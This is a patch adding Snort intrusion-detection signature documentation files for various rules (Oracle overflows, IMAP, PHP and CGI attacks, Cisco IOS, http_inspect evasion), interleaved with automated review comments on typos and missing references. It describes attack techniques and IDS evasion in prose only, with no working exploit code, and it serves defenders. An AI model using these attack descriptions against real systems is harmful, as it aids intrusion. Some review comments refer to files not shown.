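Review bot: The Additional References URLs are hard-wrapped across two lines (e.g. "...AEFE-916" / "1D2E5AF97&displaylang=en"), which breaks them when copied; keep each URL on one line. The three BizTalk 2000 entries and the two BizTalk 2002 entries point to the same two downloads respectively, so they can be collapsed to one link per product. Impact has typos: "retreive", "in formation" (for "information"), "priviliges". Since Detailed Information says the rule matches requests to RawCustomSearchField.asp containing the string "exec", False Positives should note that legitimate requests containing that substring will also trigger it rather than "None Known.", and Corrective Action should point to the specific patches under Additional References rather than "Microsoft.com".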
--- /dev/null
+++ b/doc/signatures/119-1.txt
@@ -0,0 +1,63 @@
+Rule: 
+
+--
+Sid: 
+119-1
+
+-- 
+Summary: 
+This event is generated when the pre-processor http_inspect
+detects network traffic that may constitute an attack.
+
+-- 
+Impact: 
+Unknown. This may be an attempt to evade IDS.
+
+--
+Detailed Information:
+This event indicates that the http_inspect pre-processor has detected
+web traffic containing coded ascii values.
+
+--
+Affected Systems:
+	All web servers.
+
+--
+Attack Scenarios: 
+An attacker may try to encode an attack by using the hexadecimal
+representation of the ascii characters used in an attempt to evade
+detection by IDS.
+
+-- 
+Ease of Attack: 
+Simple
+
+-- 
+
+False Positives:
+These encodings can be relatively prevalent in normal web traffic.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action:
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches.
+
+--
+Contributors:
+Daniel Roelker <droelker@sourcefire.com> 
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+HTTP IDS Evasions Revisited - Daniel Roelker
+http://docs.idsresearch.org/http_ids_evasions.pdf
+
+--
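Review bot: "coded ascii values" in Detailed Information is unclear; Attack Scenarios says the traffic carries the "hexadecimal representation of the ascii characters", so state "hex-encoded ASCII characters" there and write ASCII in capitals in both places. The Sid "119-1" is a generator:id pair for the http_inspect preprocessor rather than a plain Sid; a brief note of that convention would help readers comparing it with the other files. Given that False Positives says these encodings are "relatively prevalent in normal web traffic", Corrective Action would be more useful if it also suggested tuning or thresholding the event rather than only "Check the target host for signs of compromise."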
--- /dev/null
+++ b/doc/signatures/100000630.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+100000630
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "review_validate.php" using a remote file being passed as 
+the "admin_template_path" parameter may indicate that an exploitation attempt 
+has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the 
+"review_validate.php" script used by the "Indexu" application running on a 
+webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
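Review bot: Same issues as the other Indexu entry (inv_markunpaid.php): the Attack Scenarios section and the third Detailed Information paragraph describe credential weaknesses, not a remote file include through "admin_template_path" in "review_validate.php"; "ona web server" and "attackers choosing" need fixing; and the "--" separators after Sid, Affected Systems and Contributors lack the preceding blank line. Since this file and 100000601.txt differ only in the script name, consider generating both from one template so that corrections land in both.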
+
--- /dev/null
+++ b/doc/signatures/2856.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2856
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure switch_mview_master
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
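Review bot: The procedure name is split by a stray line break in Detailed Information ("vulnerability in the procedure switch_mview_master" / ". This procedure is included in" / "dbms_repcat."); join these into one sentence such as "vulnerability in the procedure switch_mview_master, which is included in the dbms_repcat package." Affected Systems reads "Oracle Oracle9i" (duplicated vendor name). Additional References is empty; the Oracle alert or CVE for the dbms_repcat overflows would let readers identify the "appropriate vendor supplied patch".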
--- /dev/null
+++ b/doc/signatures/1821.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+1821
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in dvips on some RedHat Linux systems.
+
+--
+Impact:
+Execution of commands with the privileges of the lp daemon.
+
+--
+Detailed Information:
+dvips is used to convert DVI documents into PostScript format for
+printing. The line printer daemon may use dvips to print DVI documents
+using a filter.
+
+A configuration error in some distributions of RedHat Linux allows a
+remote attacker to execute commands via this utility.
+
+--
+Affected Systems:
+	RedHat Linux 6.2, 7.0 and 7.1
+
+--
+Attack Scenarios:
+The attacker can place the commands to be excuted in a DVI file and send
+that to the lp daemon.
+
+--
+Ease of Attack:
+Simple. No exploit software is required.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+
+Ensure that dvips is executed in safe mode by the lp daemon by
+specifying the use of the -R flag in the dvi-to-ps.fpi configuration file.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
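Review bot: "excuted" under Attack Scenarios should be "executed". Corrective Action has two consecutive blank lines, and Additional References consists of two blank lines with no content; the vendor advisory covering the dvips "-R" safe-mode change in dvi-to-ps.fpi should be listed there. "RedHat" is written as one word throughout; the vendor's name is "Red Hat".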
--- /dev/null
+++ b/doc/signatures/3008.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+3008
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer overflow
+associated with the DELETE command of the IPSwitch IMail IMAP service.
+
+--
+Impact:
+A successful attack may cause a denial of service or a buffer overflow and the
+subsequent execution of arbitrary code on a vulnerable server.
+
+--
+Detailed Information:
+A vulnerability exists in the way that the IPSwitch IMail IMAP service
+handles a DELETE command.  An excessively long user-supplied mailbox name
+to be deleted can trigger a denial of service or a buffer overflow and the
+subsequent execution of arbitrary code on a vulnerable server.
+
+--
+Affected Systems:
+	IPSwitch IMail IMAP4 server 8.13
+
+--
+Attack Scenarios:
+An attacker can supply an overly long mailbox name for deletion, possibly causing
+denial of service or a buffer overflow.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+--
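Review bot: Corrective Action says "Upgrade to the latest non-affected version of the software." but neither it nor Additional References (empty) identifies that version, while Affected Systems lists only "IPSwitch IMail IMAP4 server 8.13"; add the vendor advisory so readers can tell which release fixed the DELETE handling. The Attack Scenarios line "An attacker can supply an overly long mailbox name for deletion, possibly causing" exceeds the wrap width used by the rest of the file.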
--- /dev/null
+++ b/doc/signatures/3125.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+3125
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft License Logging Service.
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+Microsoft License Logging Service is used to manage licenses for
+Microsoft server products.
+
+A vulnerability in the service exists due to a programming error such
+that an unchecked buffer may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain administrative access to the target host.
+
+The unchecked buffer exists when processing the length of messages sent
+to the logging service.
+
+--
+Affected Systems:
+	Microsoft Windows Server 2003
+	Microsoft Windows Server 2000
+	Microsoft Windows NT Server
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message to the service
+containing code of their choosing to be run on the server.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
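Review bot: "Additional References:" is empty although the Detailed Information section pins the bug precisely ("The unchecked buffer exists when processing the length of messages sent to the logging service."); the Microsoft security bulletin and CVE for the License Logging Service overflow should be cited. Two smaller points: the product list has "Microsoft Windows Server 2000", which is not a product name (the family is Windows 2000 Server), and the separator before "Corrective Action:" is followed by a stray blank line ("-- " / "" / "Corrective Action: ") unlike every other section in the file; several "-- " and "Rule: " lines also carry trailing whitespace. Note also that this text is identical to the 3111.txt document later in this patch apart from the Sid; if the two rules match different parts of the traffic, the documents should say what distinguishes them.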
--- /dev/null
+++ b/doc/signatures/1250.txt
@@ -0,0 +1,59 @@
+Rule:
+--
+Sid:
+1250
+
+--
+Summary:
+Attack on Cisco router/switch web interface
+
+--
+Impact:
+Unauthorized administrative access to Cisco devices running vulnerable versions of IOS (router/switch operating system)
+
+--
+Detailed Information:
+Cisco routers and switches running vulnerable IOS versions can be attacked simply by typing in a URL, giving the attacker administrative access to the device.  The device must be running the web configuration interface, a web server that enables a user to configure the device via a web browser.
+
+--
+Affected Systems:
+Cisco routers and switches running affected versions of IOS and whose web management interface is enabled. See http://www.securityfocus.com/bid/2936 
+
+--
+Attack Scenarios:
+Attacker identifies http server running on Cisco switch or router.  Attacker then makes an http connection with the particular URL required to gain administrative control.
+
+--
+Ease of Attack:
+Simple. Web request, no exploit software needed.
+
+--
+False Positives:
+Legitimate access to the configuration manager will generate an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade IOS to the latest non-affected version.
+
+Apply the appropriate vendor supplied Patches
+
+Disable the web configuration interface.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by James Affeld <jamesaffeld@yahoo.com>
+
+-- 
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/2936
+
+--
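Review bot: "Affected Systems:" defers entirely to the Bugtraq link ("Cisco routers and switches running affected versions of IOS ... See http://www.securityfocus.com/bid/2936") instead of listing the vulnerable IOS trains, which is what an analyst triaging the event needs without leaving the console; suggest enumerating them from the referenced advisory. Layout nits: "Rule:" is immediately followed by "--" with no blank line, unlike the other files, and "Apply the appropriate vendor supplied Patches" has a stray capital. The False Positives entry ("Legitimate access to the configuration manager will generate an event.") is useful and could be tied to the Corrective Action "Disable the web configuration interface." by noting that disabling the interface also removes the false-positive source.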
--- /dev/null
+++ b/doc/signatures/2677.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2677
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure instantiate_online
+. This procedure is included in
+dbms_repcat_rgt.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
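Review bot: The procedure name is split from its sentence by a stray line break ("vulnerability in the procedure instantiate_online" / ". This procedure is included in" / "dbms_repcat_rgt."), which looks like a template-fill artifact; it should read as one sentence. "Affected Systems:" lists "Oracle Oracle9i" (vendor name doubled), "None Known" lacks the trailing period used elsewhere, and "Apply the appropriate vendor supplied patch" is missing its period. "Additional References:" is empty; the package and procedure names are specific enough that the Oracle alert or a CVE should be cited.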
--- /dev/null
+++ b/doc/signatures/2628.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2628
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in database
+replication. The "repcat_import_check" procedure contains a
+programming error that may allow an attacker to execute a buffer
+overflow attack.
+
+This overflow is triggered by a long string in some parameters for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to the "gowner" or "gname"
+variable to cause the overflow. The result could permit the
+attacker to gain escalated privileges and run code of their
+choosing. This attack requires an attacker to logon to the
+database with a valid username and password combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck90.html
+
+--
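Review bot: The Snort configuration instruction in Detailed Information ("If you are running Oracle on a Windows server, make sure that the variable $ORACLE_PORTS is set to a value of "any".") is given without explanation; it should say why (the rule only inspects traffic to the ports in that variable, so it must cover every port the Oracle listener actually uses on that platform) and it belongs under a tuning or Corrective Action heading rather than in the vulnerability description. Also "vulnerability in a Oracle database implementation" should be "an Oracle", "gowner" or "gname" are parameters of the procedure rather than variables, and "Affected Systems:" is indented with spaces where the other files use a tab.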
--- /dev/null
+++ b/doc/signatures/1244.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+1244
+
+--
+Summary:
+This event is generated when an attempt is made to access the .idq Indexing Service ISAPI filter. 
+
+--
+Impact:
+Intelligence gathering activity. If an .idq file is erroneously shared from a network share, an error message is returned from a request that contains the share path will be disclosed.
+
+--
+Detailed Information:
+Microsoft Internet Information Service (IIS) installs several Internet Service Application Programming Interface (ISAPI) extensions.  The .idq ISAPI filter provides support for Internet Data Queries.  Files with the .idq suffix should not be located on network shares.  If an attempt is made to access them from a network share, an error message is returned disclosing the share path.  
+
+--
+Affected Systems:
+Hosts running IIS 4.0
+Hosts running IIS 5.0
+
+--
+Attack Scenarios:
+An attacker can attempt to access a file with the .idq suffix in an attempt to receive an error message with disclosure about the share path.
+
+--
+Ease of Attack:
+Simple. 
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Do not place files with the .idq suffix on a network share.
+ 
+
+--
+Contributors:
+Original rule written by Dr SuSE and C. Mayor 
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids
+http://www.whitehats.com/info/IDS552
+
+CVE
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0071
+
+
+--
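Review bot: The Impact sentence is ungrammatical and hard to parse: "If an .idq file is erroneously shared from a network share, an error message is returned from a request that contains the share path will be disclosed."; suggest "If an .idq file is placed on a network share, a request for it returns an error message that discloses the share path." Layout: "Affected Systems:" entries ("Hosts running IIS 4.0", "Hosts running IIS 5.0") are not tab-indented like the other files, there is a whitespace-only line after "Do not place files with the .idq suffix on a network share.", and the reference labels "Arachnids" and "CVE" lack the colon used in the other documents ("Bugtraq:").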
--- /dev/null
+++ b/doc/signatures/1201.txt
@@ -0,0 +1,77 @@
+Rule:
+
+--
+Sid:
+1201
+
+--
+Summary:
+This event is generated when a 403 error response code is returned to a
+client by a webserver.
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+This event is generated when a 403 error response code is returned to a
+client by a webserver. This may indicate an attempt to gain unauthorized
+access to a web server or an application running on a web server.
+
+The 400 series error messages are used to indicate an error on the part
+of the browser client making the request to a web server. The 403
+response indicates a request for a forbidden resource that cannot be
+accessed even with authentication credentials.
+
+Many events may indicate a determined attempt to exploit a vulnerability
+on the victim server.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All web server platforms
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits for  many vulnerabilities exist although no exploit
+code may be required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
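Review bot: "False Positives: None known." cannot be right for a rule whose Summary states it fires on every "403 error response code ... returned to a client by a webserver": any legitimately forbidden request (a denied directory listing, a crawler hitting a protected path, a user lacking permission) will generate the event, and the section should say so and suggest threshold or suppression tuning. The Attack Scenarios and the second half of Detailed Information are the generic "credentials of a client host" template text from the PHP/CGI documents and do not describe a response-side signature; suggest replacing them with what a burst of 403s actually indicates (forced browsing or scanning). Minor: "Exploits for  many vulnerabilities" has a double space.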
--- /dev/null
+++ b/doc/signatures/2565.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+2565
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a PHP web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a PHP application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the PHP application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running PHP applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
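Review bot: The Summary and Detailed Information never name the PHP application, script, or parameter this rule matches ("a known vulnerability in a PHP web application running on a server"), so an analyst cannot tell what was requested; compare 2203.txt in this same patch, which names everythingform.cgi and the "config" field. Suggest stating the script and the matched request component, and adding at least one reference under the empty "Additional References:". Typos: "running ona web server" and "attackers choosing" (twice) should be "on a web server" and "attacker's choosing"; the line "relationships between the victim server and other hosts can be exploited by the attacker." exceeds the wrap width used elsewhere.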
--- /dev/null
+++ b/doc/signatures/2203.txt
@@ -0,0 +1,55 @@
+Rule:  
+
+--
+Sid:
+2203
+
+--
+Summary:
+This event is generated when an attempt is made to access everythingform.cgi on an internal web server. This may indicate an attempt to exploit a remote command execution vulnerability in Leif M. Wright's everythingform.cgi script.
+
+--
+Impact:
+Remote execution of arbitrary code, possibly leading to remote root compromise.
+
+--
+Detailed Information:
+Leif Wright's everythingform.cgi script is a Perl script that processes multiple forms. It contains a parsing vulnerability in a hidden "config" field that enables an attacker to run arbitrary shell commands with the security context of the web server.
+
+--
+Affected Systems:
+Web servers running Leif M. Wright Everythingform.cgi 2.0.
+--
+Attack Scenarios:
+An attacker uses a specially crafted value for the config field. Any commands included in the value are executed with the security context of the web server.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+If a legitimate remote user accesses everythingform.cgi, this rule may generate an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disable everythingform.cgi. 
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Sourcefire Technical Publications Team
+Jennifer Harvey <jennifer.harvey@sourcefire.com>
+
+-- 
+Additional References:
+Bugtraq
+http://www.securityfocus.com/bid/2101
+
+--
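Review bot: The Impact ("possibly leading to remote root compromise") overstates what Detailed Information supports, which is that commands run "with the security context of the web server"; root is only reached if the server itself runs as root, so the Impact line should say so. Layout: a blank line is missing between "Web servers running Leif M. Wright Everythingform.cgi 2.0." and the following "--", "Rule:  " has trailing spaces, the script is capitalised inconsistently ("Everythingform.cgi" vs "everythingform.cgi"), and "Additional References:" lacks the blank line before "Bugtraq" used in the other files.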
--- /dev/null
+++ b/doc/signatures/115-2.txt
@@ -0,0 +1,72 @@
+
+
+Rule:
+
+--
+Sid:
+115-2
+
+--
+Summary:
+This event is generated when the pre-processor asn1 detects network
+traffic that may constitute an attack. Specifically an invalid asn.1
+length encoding was detected.
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+This event is generated when the asn1 pre-processor detects network
+traffic that may consititute an attack.
+
+
+An invalid length parameter in the asn1 packet header may indicate an
+attempt to exploit a vulnerability in the application using asn1
+libraries or alternatively it may be an attempt to evade detection by
+an IDS that may not correctly process asn1 data.
+
+More information on this event can be found in the individual
+pre-processor documentation README.asn1 in the docs directory of the
+snort source. Detailed instructions and examples on how to tune and use
+the pre-processor can also be found in the same document.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Daniel Roelker <droelker@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+ASN1 Information Site:
+http://asn1.elibel.tm.fr/
+
+--
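Review bot: "Attack Scenarios:" is empty, yet Detailed Information already describes the two cases ("an attempt to exploit a vulnerability in the application using asn1 libraries" and "an attempt to evade detection by an IDS that may not correctly process asn1 data"); suggest moving those into the scenarios section, and replacing "Impact: Unknown." with the same two possibilities. Typos and layout: "consititute" should be "constitute", the file opens with two blank lines before "Rule:", and there is a double blank line after "traffic that may consititute an attack." in Detailed Information.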
--- /dev/null
+++ b/doc/signatures/1904.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+1904
+
+--
+Summary:
+This event is generated when a remote attacker sends an IMAP FIND
+command with a malformed argument to an internal IMAP server. This may
+indicate an attempt to exploit a buffer overflow vulnerability in the
+IMAP FIND command.
+
+--
+Impact:
+Possible shell access on the IMAP server, leading to arbitrary code
+execution. The attacker must have a valid IMAP account on the mail
+server to attempt this exploit.
+
+--
+Detailed Information:
+When a FIND command with a malformed and overly long argument is sent to
+a vulnerable IMAP server, a buffer overflow condition may occur. This
+can allow an attacker to execute arbitrary code from the command shell.
+Note that this exploit can only be attempted by a user with a valid IMAP
+account.
+
+--
+Affected Systems:
+	University of Washington imapd versions 10.234 or 12.264.
+
+--
+Attack Scenarios:
+An attacker with an IMAP account on the server can send a malformed and
+sufficiently long FIND command to the IMAP server, creating a buffer
+overflow condition. This can then allow the attacker to execute
+arbitrary shell code on the compromised server.
+
+--
+Ease of Attack:
+Simple. Exploits exist, but the user must have a valid IMAP account on
+the server.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the patch for your current version of imapd appropriate to your
+operating system.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Sourcefire Technical Publications Team
+Jennifer Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+
+--
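Review bot: "Additional References:" is empty although the document names exact versions ("University of Washington imapd versions 10.234 or 12.264."); a vendor or CVE reference should be added so the version check can be verified. The requirement for a valid IMAP account is stated three times (Impact, Detailed Information, Ease of Attack); once, in Ease of Attack, is enough, and the remaining space could say what "malformed argument" means for this rule (a length threshold rather than content), which is what tuning needs.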
--- /dev/null
+++ b/doc/signatures/1425.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1425
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a PHP web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a PHP application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the PHP application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running PHP applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
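Review bot: This document is a word-for-word copy of 2565.txt earlier in this patch with only the Sid changed, so it does not say which PHP script or parameter rule 1425 matches; each document should name its own target so the two events can be told apart during triage. The same typos are carried over ("running ona web server", "attackers choosing"), and "Additional References:" is empty.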
--- /dev/null
+++ b/doc/signatures/2715.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2715
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
